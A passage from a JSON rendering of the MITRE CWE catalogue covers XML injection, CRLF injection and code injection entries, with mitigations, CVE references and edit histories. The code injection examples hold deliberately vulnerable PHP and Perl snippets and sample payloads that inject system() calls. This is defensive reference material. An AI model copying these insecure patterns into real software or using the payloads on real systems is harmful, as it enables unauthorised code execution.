syntax.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XML injection (aka Blind Xpath injection)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":23,"Entry_Name":"XML Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"83"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-882"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, "XML Injection", Page 1069"}}]},"Notes":{"Note":[{"#text":"The description for this entry is generally applicable to XML, but the name includes \\"blind XPath injection\\" which is more closely associated with CWE-643. Therefore this entry might need to be deprecated or converted to a general category - although injection into raw XML is not covered by CWE-643 or CWE-652.","attr":{"@_Type":"Maintenance"}},{"#text":"In vulnerability theory terms, this is a representation-specific case of a Data/Directive Boundary Error.","attr":{"@_Type":"Theoretical"}},{"#text":"Under-reported. This is likely found regularly by third party code auditors, but there are very few publicly reported examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"92":{"attr":{"@_ID":"92","@_Name":"DEPRECATED: Improper Sanitization of Custom Special Characters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated. It originally came from PLOVER, which sometimes defined \\"other\\" and \\"miscellaneous\\" categories in order to satisfy exhaustiveness requirements for taxonomies. Within the context of CWE, the use of a more abstract entry is preferred in mapping situations. CWE-75 is a more appropriate mapping.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Time_of_Introduction, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Custom Special Character Injection","attr":{"@_Date":"2008-10-14"}},{"#text":"Insufficient Sanitization of Custom Special Characters","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Custom Special Characters","attr":{"@_Date":"2009-07-27"}}]}},"93":{"attr":{"@_ID":"93","@_Name":"Improper Neutralization of CRLF Sequences (\'CRLF Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"117","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Avoid using CRLF as a special sequence."},{"Phase":"Implementation","Description":"Appropriately filter or quote CRLF sequences in user-controlled input."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"If user input data that eventually makes it to a log message isn\'t checked for CRLF characters, it may be possible for an attacker to forge entries in a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"logger.info(\\"User\'s street address: \\" + request.getParameter(\\"streetAddress\\"));"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1771","Description":"CRLF injection enables spam proxy (add mail headers) using email address or name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1771"},{"Reference":"CVE-2002-1783","Description":"CRLF injection in API function arguments modify headers for outgoing requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1783"},{"Reference":"CVE-2004-1513","Description":"Spoofed entries in web server log file via carriage returns","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1513"},{"Reference":"CVE-2006-4624","Description":"Chain: inject fake log entries with fake timestamps using CRLF injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4624"},{"Reference":"CVE-2005-1951","Description":"Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1951"},{"Reference":"CVE-2004-1687","Description":"Chain: HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1687"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"CRLF Injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":24,"Entry_Name":"HTTP Request Splitting"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"81"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-928"}}},"Notes":{"Note":{"#text":"Probably under-studied, although gaining more prominence in 2005 as a result of interest in HTTP response splitting.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"CRLF Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize CRLF Sequences (aka \'CRLF Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize CRLF Sequences (\'CRLF Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"94":{"attr":{"@_ID":"94","@_Name":"Improper Control of Generation of Code (\'Code Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.","Extended_Description":{"xhtml:p":["When software allows a user\'s input to contain code syntax, it might be possible for an attacker to craft the code in such a way that it will alter the intended control flow of the software. Such an alteration could lead to arbitrary code execution.","Injection problems encompass a wide variety of issues -- all mitigated in very different ways. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Interpreted","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Injected code can access resources that the attacker is directly prevented from accessing."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Refactor your program so that you do not have to dynamically generate code."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Run your code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your software.","Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit()."]}},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Compilation or Build Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-32"},"Intro_Text":"This example attempts to write user messages to a message file and allow users to view them.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$MessageFile = \\"messages.out\\";if ($_GET[\\"action\\"] == \\"NewMessage\\") {}else if ($_GET[\\"action\\"] == \\"ViewMessages\\") {}","xhtml:br":["",""],"xhtml:div":[{"#text":"$name = $_GET[\\"name\\"];$message = $_GET[\\"message\\"];$handle = fopen($MessageFile, \\"a+\\");fwrite($handle, \\"<b>$name</b> says \'$message\'<hr>\\\\n\\");fclose($handle);echo \\"Message Saved!<p>\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"include($MessageFile);","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"name=h4x0rmessage=%3C?php%20system(%22/bin/ls%20-l%22);?%3E","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"<?php system(\\"/bin/ls -l\\");?>"}],"Body_Text":["While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as:","which will decode to the following:","The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages.","Notice that XSS (CWE-79) is also possible in this situation."]},{"attr":{"@_Demonstrative_Example_ID":"DX-31"},"Intro_Text":"edit-config.pl: This CGI script is used to modify settings in a configuration file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"use CGI qw(:standard);sub config_file_add_key {}sub config_file_set_key {}sub config_file_delete_key {}sub handleConfigAction {}$configfile = \\"/home/cwe/config.txt\\";print header;if (defined(param(\'action\'))) {}else {}","xhtml:br":["","","","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to add a field/key to a file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to set key to a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to delete key from a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $action) = @_;my $key = param(\'key\');my $val = param(\'val\');my $code = \\"config_file_$action_key(\\\\$fname, \\\\$key, \\\\$val);\\";eval($code);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["# this is super-efficient code, especially if you have to invoke","# any one of dozens of different functions!"]}},{"#text":"handleConfigAction($configfile, param(\'action\'));","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"No action specified!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"add_key(\\",\\",\\"); system(\\"/bin/ls\\");"},{"attr":{"@_Nature":"result"},"xhtml:div":"config_file_add_key(\\",\\",\\"); system(\\"/bin/ls\\");"}],"Body_Text":["The script intends to take the \'action\' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as:","This would produce the following string in handleConfigAction():","Any arbitrary Perl code could be added after the attacker has \\"closed off\\" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker\'s payload is activated. This particular manipulation would fail after the system() call, because the \\"_key(\\\\$fname, \\\\$key, \\\\$val)\\" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5071","Description":"Eval injection in PHP program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5071"},{"Reference":"CVE-2002-1750","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750"},{"Reference":"CVE-2008-5305","Description":"Eval injection in Perl program using an ID that should only contain hyphens and numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305"},{"Reference":"CVE-2002-1752","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1752"},{"Reference":"CVE-2002-1753","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1753"},{"Reference":"CVE-2005-1527","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1527"},{"Reference":"CVE-2005-2837","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2837"},{"Reference":"CVE-2005-1921","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921"},{"Reference":"CVE-2005-2498","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2498"},{"Reference":"CVE-2005-3302","Description":"Code injection into Python eval statement from a field in a formatted file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3302"},{"Reference":"CVE-2007-1253","Description":"Eval injection in Python program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253"},{"Reference":"CVE-2001-1471","Description":"chain: Resultant eval injection. An invalid value prevents initialization of variables, which can be modified by attacker and later injected into PHP eval statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471"},{"Reference":"CVE-2002-0495","Description":"Perl code directly injected into CGI library file from parameters to another CGI program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0495"},{"Reference":"CVE-2005-1876","Description":"Direct PHP code injection into supporting template file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1876"},{"Reference":"CVE-2005-1894","Description":"Direct code injection into PHP script that can be accessed by attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1894"},{"Reference":"CVE-2003-0395","Description":"PHP code from User-Agent HTTP header directly inserted into log file implemented as PHP script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0395"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_ID":"CODE","Entry_Name":"Code Evaluation and Injection"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"242"}},{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"77"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 3: Web-Client Related Vulnerabilities (XSS)." Page 63"}}},"Notes":{"Note":{"#text":"Many of these weaknesses are under-studied and under-researched, and terminology is not sufficiently precise.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Type"},{"Modification_Name":"CWE Content 